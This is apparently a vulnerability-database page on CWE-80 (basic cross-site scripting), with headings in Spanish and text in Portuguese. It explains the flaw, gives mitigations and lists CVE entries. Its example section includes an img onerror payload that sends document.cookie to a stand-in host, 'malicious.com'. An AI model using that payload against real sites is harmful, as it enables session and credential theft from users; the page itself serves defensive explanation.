Fallos del tipo CWE-80

586 resultados

Falta de neutralização de tags HTML relacionadas a scripts (XSS básico)

Quando uma aplicação web recebe dados do usuário e os insere diretamente no HTML da página sem sanitização ou escapamento, um atacante consegue injetar tags e scripts maliciosos que executam no navegador de outros usuários. É um dos tipos mais comuns de XSS (Cross-Site Scripting) e permite roubo de sessão, credenciais ou redirecionamento para sites maliciosos.

Ejemplo

Um formulário de busca que mostra o termo pesquisado na página sem validação: se o usuário entra <script>alert('xss')</script>, o script executa. Ou um campo de comentário que exibe <img src=x onerror='fetch(malicious.com?cookie='+document.cookie+')'>, roubando o cookie da sessão.

Cómo mitigar

Sempre escapar/encodar saídas HTML (ex: converter < para &lt;, > para &gt;), usar Content Security Policy (CSP) nos headers HTTP, e validar/sanitizar entrada no servidor. Em JavaScript, prefira textContent no lugar de innerHTML quando possível; em frameworks, use templating seguro (React, Vue escapam por padrão).

CVE-2024-51689HIGHWordPress CF7 WOW Styler plugin <= 1.6.8 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.3%CVE-2024-41697MEDIUMPriority – CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)EPSS 0.3%CVE-2026-19988MEDIUMAlaev SEO Tools Extension Popup UI popup.html addDiv cross site scriptingEPSS 0.3%CVE-2026-12751MEDIUMMultiple security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for August 2026.EPSS 0.3%CVE-2024-41693MEDIUMMashov - CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)EPSS 0.3%CVE-2024-41752MEDIUMIBM Cognos Analytics HTML injectionEPSS 0.3%CVE-2025-49137HIGHHax CMS Stored Cross-Site Scripting vulnerabilityEPSS 0.3%CVE-2024-38318MEDIUMIBM Aspera Shares HTML injectionEPSS 0.3%CVE-2026-50146HIGHAstro: Reflected XSS via unescaped slot nameEPSS 0.3%CVE-2025-54789MEDIUMFiles is Vulnerable to Reflected Self-XSS through its File Move FunctionalityEPSS 0.3%CVE-2025-32230MEDIUMWordPress Tutor LMS plugin <= 3.4.0 - HTML Injection vulnerabilityEPSS 0.3%CVE-2026-44369HIGHCVAT: Stored XSS via annotation guidesEPSS 0.3%CVE-2024-49337MEDIUMIBM OpenPages HTML injectionEPSS 0.3%CVE-2026-28499MEDIUMLeafKit's HTML escaping may be skipped for Collection values, enabling XSSEPSS 0.3%CVE-2025-71310LOWThe GDPR cookies module for Backdrop CMS (before 1.x-1.3.5) doesn't sufficiently protect visitors from Cross Site Scripting (XSS) if a malEPSS 0.3%CVE-2026-20070MEDIUMCisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software VPN Web Services Cross-Site Scripting VulnerabilityEPSS 0.3%CVE-2025-15058MEDIUMResponsive Pricing Table <= 5.1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'table_currency'EPSS 0.3%CVE-2026-39941MEDIUMChurchCRM has an XSS vulnerabilityEPSS 0.3%CVE-2024-51475MEDIUMIBM Content Navigator HTML injectionEPSS 0.3%CVE-2025-29427MEDIUMCode-projects Online Class and Exam Scheduling System V1.0 is vulnerable to Cross Site Scripting (XSS) in profile.php via the member_first aEPSS 0.3%